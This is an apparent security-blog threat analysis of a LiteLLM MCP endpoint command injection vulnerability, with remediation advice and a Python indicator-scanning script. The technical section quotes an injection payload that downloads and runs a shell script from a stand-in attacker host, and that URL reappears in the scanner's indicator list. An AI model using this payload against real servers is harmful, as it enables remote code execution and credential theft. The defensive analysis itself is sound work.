HP Halting Problems Security research, supply chain threats, and systems risk.
♥ Help support the site
btc
bc1q3909urygy90qhytu32344ws0t5vy085y0h7xc8
eth
0x71faaDcAF2538e7346885F772FBAcb88740059A8
xmr
49PeCUfdgmG1ZMAzUxz2WFWiRDbDrycrJ8qYVfxBq6HWCHjk7uncaoESm7CRF5DtxcFgStuvyvcfUD3p4xU33F8dPep53MP
critical Threat analysis

LiteLLM CVE-2026-42271: KEV Command Injection in AI Proxy Servers

CISA added BerriAI LiteLLM CVE-2026-42271 to its KEV catalog on 2026-06-08 due to active exploitation. This high-severity command injection vulnerability in MCP server preview endpoints allows authenticated (or unauthenticated, when chained with CVE-2026-48710) users to run arbitrary shell commands on the host proxy.

Published
Read time
5 min read
Sources
3
#litellm#cisa-kev#remote-code-execution#zero-day#starlette
On this page 0% read

    Executive Summary

    CISA added CVE-2026-42271 to the Known Exploited Vulnerabilities catalog on 2026-06-08, marking it as actively exploited CISA KEV. The affected product is BerriAI LiteLLM, an open-source AI gateway and LLM proxy. The vulnerability is a command injection flaw in the Model Context Protocol (MCP) server preview endpoints that allows attackers to execute arbitrary shell commands on the hosting system.

    While the vulnerability originally required authentication with a valid API key, researchers have confirmed that it can be chained with CVE-2026-48710 (the “BadHost” Host header validation bypass in Starlette), allowing unauthenticated remote attackers to bypass the authentication middleware and achieve Remote Code Execution (RCE) on the server. BerriAI has addressed the issue in LiteLLM version 1.83.7-stable by restricting access to these endpoints to the PROXY_ADMIN role. Treat any LiteLLM instance exposed to the internet between versions 1.74.2 and 1.83.6 as a critical intrusion risk.

    Key Facts

    cve: "CVE-2026-42271"
vendor: "BerriAI"
product: "LiteLLM"
vulnerability: "Command injection in MCP preview endpoints"
cwe: "CWE-78"
disclosed_date: "2026-06-08"
kev_added: "2026-06-08"
affected_packages:
  - "litellm"
affected_versions: "1.74.2 to 1.83.6"
fixed_version: "1.83.7-stable"
chaining_cve: "CVE-2026-48710"
high_value_evidence:
  - "litellm --version"
  - "POST /mcp-rest/test/connection"
  - "POST /mcp-rest/test/tools/list"

    Source Confidence & Evidence Mapping

    • confirmed: CISA added CVE-2026-42271 to the KEV catalog, verifying active exploitation in the wild CISA KEV.
    • confirmed: NIST NVD and security advisories describe the vulnerability as a command injection in the LiteLLM Model Context Protocol connection test and tools listing endpoints NIST NVD.
    • confirmed: BerriAI released version 1.83.7-stable to patch the vulnerability by enforcing PROXY_ADMIN authorization for /mcp-rest/test/* endpoints LiteLLM Release.
    • confirmed: Security researchers demonstrated chaining this flaw with Starlette’s BadHost vulnerability (CVE-2026-48710) to execute code without authentication.

    Impact Determination

    ClassificationCriteriaRequired evidenceHandling decision
    Confirmed compromiseSystem logs show requests to /mcp-rest/test/connection or /mcp-rest/test/tools/list containing shell metacharacters or unexpected executable commands, or unrecognized admin credentials created.HTTP request payload traces, process execution logs showing shell spawning under the LiteLLM process user, or unauthorized system configuration changes.Isolate the host immediately, rotate all keys/secrets stored in LiteLLM (including OpenAI, Anthropic, AWS, GCP API keys), and conduct full system forensics.
    Presumed exposedLiteLLM is running version < 1.83.7-stable and the proxy admin panel or MCP features are enabled or exposed.Lockfiles (requirements.txt, poetry.lock) showing litellm version within the range 1.74.2 to 1.83.6.Upgrade to 1.83.7-stable or newer immediately; restrict internet access to admin/MCP paths.
    Potentially exposedLiteLLM is present in the asset inventory but the exact version or feature configuration is unverified.Software inventory, container registry tags, or repository dependency checks.Run dependency checks and verify version status.
    Not exposedLiteLLM is verified to be on version >= 1.83.7-stable, or the product is not used in the environment.Verified build logs or inventory exclusion.No immediate action required.
    UnknownSystem logs or version information is missing.Telemetry gap in application or host level logging.Assume exposure and update packages proactively.

    Timeline

    • 2026-06-08: CISA adds CVE-2026-42271 to the Known Exploited Vulnerabilities catalog.
    • 2026-06-08: Security advisories publish the Starlette BadHost chain details showing unauthenticated RCE.
    • 2026-06-09: This threat post analysis is published.

    Technical Analysis

    LiteLLM provides proxy management endpoints for testing Model Context Protocol (MCP) servers. The endpoints POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list accept an MCP server configuration object. This configuration includes fields like command (the command to launch the MCP server) and args (the CLI arguments).

    Because LiteLLM passed these inputs directly to system shell execution processes without validation, an attacker could supply arbitrary commands (e.g. ; curl http://attacker.com/shell.sh | sh). When combined with CVE-2026-48710, an attacker could bypass authentication checks, allowing any remote user to execute commands with the privileges of the LiteLLM process.

    Affected Assets and Blast Radius

    asset_selectors:
  - "litellm"
highest_value_assets:
  - "Internet-exposed LiteLLM proxy servers handling production API keys"
credentials_and_data_at_risk:
  - "Upstream API tokens (OpenAI, Anthropic, Cohere, AWS, Azure, GCP)"
  - "Local server shell access and SSH keys"

    Indicators And Detection Selectors

    vulnerabilities: ["CVE-2026-42271", "CVE-2026-48710"]
packages: ["litellm", "starlette"]
telemetry_selectors:
  - "/mcp-rest/test/connection"
  - "/mcp-rest/test/tools/list"
  - "litellm"

    Detection and Hunting

    Script: local repository and exported telemetry scope

    #!/usr/bin/env python3
import os
import sys
import json
import subprocess
from pathlib import Path

ROOT = sys.argv[1] if len(sys.argv) > 1 else "."
LOG_ROOT = os.environ.get("LOG_ROOT", "")
OUT = Path(os.environ.get("OUT", "hp-litellm-cve-2026-42271-kev-scope"))
SINCE = "2026-06-08T00:00:00Z"
UNTIL = "2026-06-08T23:59:59Z"

PACKAGES = [
  "litellm",
]
VERSIONS = [
]
FILES = [
]
DOMAINS = [
  "www.cisa.gov",
  "nvd.nist.gov",
]
URLS = [
  "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
  "https://nvd.nist.gov/vuln/detail/CVE-2026-42271",
  "https://github.com/BerriAI/litellm/releases/tag/v1.83.7",
  "http://attacker.com/shell.sh",
]
IPS = [
]
HASHES = [
]
PROCESS_PATTERNS = [
]
NETWORK_PATTERNS = [
]

# Positive signal: repository, lockfile, artifact, process, or network telemetry contains one of the exact incident selectors above.
# Escalation: any match tied to a production build, CI run, deployed asset, or secret-bearing host moves the asset to presumed exposed.

OUT.mkdir(parents=True, exist_ok=True)
indicators_file = OUT / "indicators.txt"

# Collect unique indicators
indicators = set()
for group in [PACKAGES, VERSIONS, FILES, DOMAINS, URLS, IPS, HASHES, PROCESS_PATTERNS, NETWORK_PATTERNS]:
    for val in group:
        if val:
            indicators.add(val)

with open(indicators_file, "w") as f:
    for ind in sorted(indicators):
        f.write(ind + "\n")

print(f"[+] Written unique selectors to {indicators_file}")

# Walk local directory
print(f"[+] Scanning directory: {ROOT} for selectors...")
matches = []
exclude_dirs = {"node_modules", "vendor", "dist", ".git"}
for root, dirs, filenames in os.walk(ROOT):
    dirs[:] = [d for d in dirs if d not in exclude_dirs]
    for filename in filenames:
        filepath = Path(root) / filename
        try:
            content = filepath.read_text(errors="ignore")
            for ind in indicators:
                if ind in content:
                    matches.append(f"{filepath}: found '{ind}'")
        except Exception:
            pass

if matches:
    (OUT / "repository-indicator-matches.txt").write_text("\n".join(matches) + "\n")
    print(f"[!] Found {len(matches)} matches in codebase!")

# Optional Log Scanning
if LOG_ROOT and os.path.exists(LOG_ROOT):
    print(f"[+] Scanning telemetry log directory: {LOG_ROOT}...")
    log_matches = []
    for root, _, filenames in os.walk(LOG_ROOT):
        for filename in filenames:
            filepath = Path(root) / filename
            try:
                content = filepath.read_text(errors="ignore")
                for ind in indicators:
                    if ind in content:
                        log_matches.append(f"{filepath}: found '{ind}'")
            except Exception:
                pass
    if log_matches:
        (OUT / "exported-telemetry-indicator-matches.txt").write_text("\n".join(log_matches) + "\n")
        print(f"[!] Found {len(log_matches)} matches in logs!")

    if PACKAGES:
        registry_dir = OUT / "registry"
        registry_dir.mkdir(exist_ok=True)

print(f"[+] Wrote scope artifacts under {OUT}")

    Sources

    1. CISA: KEV Catalog - Role: PRIMARY_RESEARCH - Impact: Active exploitation confirmation.
    2. BerriAI: LiteLLM GitHub Security Advisory - Role: DIRECT_SOURCE - Impact: Vulnerability description and official patch.
    3. NIST NVD: CVE-2026-42271 - Role: ENRICHMENT_DATA - Impact: Severity and categorization mapping.